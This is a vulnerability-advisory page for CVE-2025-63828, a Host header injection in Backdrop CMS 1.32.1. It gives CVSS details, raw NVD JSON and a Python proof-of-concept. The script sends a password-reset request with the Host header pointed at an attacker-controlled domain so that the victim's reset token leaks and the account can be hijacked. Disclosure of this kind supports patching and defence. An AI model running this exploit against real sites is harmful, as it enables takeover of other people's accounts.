Security Vulnerability Report
CVE-2025-63828 CVSS 6.1 MEDIUM

CVE-2025-63828

Published: 2025-11-18 18:16:14
Last Modified: 2025-11-24 14:02:35

Description

Host Header Injection vulnerability in Backdrop CMS 1.32.1 allows attackers to manipulate the Host header in password reset requests, leading to redirects to malicious domains and potential session hijacking via cookie injection.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:backdropcms:backdrop_cms:1.32.1:*:*:*:*:*:*:* - VULNERABLE
Backdrop CMS 1.32.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# CVE-2025-63828 PoC - Host Header Injection in Backdrop CMS 1.32.1
# Target: Backdrop CMS password reset functionality
# Attack: Manipulate Host header to redirect password reset to malicious domain

TARGET_URL = "http://target-backdrop-cms.com"
MALICIOUS_DOMAIN = "attacker-controlled-domain.com"


def exploit_host_header_injection():
    """
    Exploit Host Header Injection in password reset functionality
    This causes the password reset email to contain a link to the attacker's domain
    """
    # Step 1: Request password reset with manipulated Host header
    reset_endpoint = f"{TARGET_URL}/user/password"
    headers = {
        "Host": MALICIOUS_DOMAIN,
        "User-Agent": "Mozilla/5.0",
        "Content-Type": "application/x-www-form-urlencoded"
    }
    data = {
        "name": "[email protected]"  # Target victim email
    }

    response = requests.post(reset_endpoint, headers=headers, data=data)
    print(f"[*] Sent password reset request with malicious Host header: {MALICIOUS_DOMAIN}")
    print(f"[*] Response Status: {response.status_code}")

    # Step 2: If successful, victim's email will contain a reset link pointing to attacker domain
    # The link format will be: http://attacker-controlled-domain.com/user/password/reset/TOKEN
    print("[*] If successful, victim will receive email with malicious password reset link")
    print("[*] Attacker can then capture the reset token and hijack the account")


if __name__ == "__main__":
    exploit_host_header_injection()
```

References

https://github.com/mertdurum06/BackdropCms-1.32.1/ (Release Notes)
https://github.com/mertdurum06/BackdropCms-1.32.1/blob/main/backdropcms_exploit.txt (Exploit)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-63828",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-18T18:16:13.753",
    "lastModified": "2025-11-24T14:02:35.000",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Host Header Injection vulnerability in Backdrop CMS 1.32.1 allows attackers to manipulate the Host header in password reset requests, leading to redirects to malicious domains and potential session hijacking via cookie injection."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
            "baseScore": 6.1,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-601"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:backdropcms:backdrop_cms:1.32.1:*:*:*:*:*:*:*",
                "matchCriteriaId": "8209232D-0189-4B0B-A2DD-AC09C6BA7B6B"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/mertdurum06/BackdropCms-1.32.1/",
        "source": "[email protected]",
        "tags": ["Release Notes"]
      },
      {
        "url": "https://github.com/mertdurum06/BackdropCms-1.32.1/blob/main/backdropcms_exploit.txt",
        "source": "[email protected]",
        "tags": ["Exploit"]
      },
      {
        "url": "https://github.com/mertdurum06/BackdropCms-1.32.1/blob/main/backdropcms_exploit.txt",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "tags": ["Exploit"]
      }
    ]
  }
}
```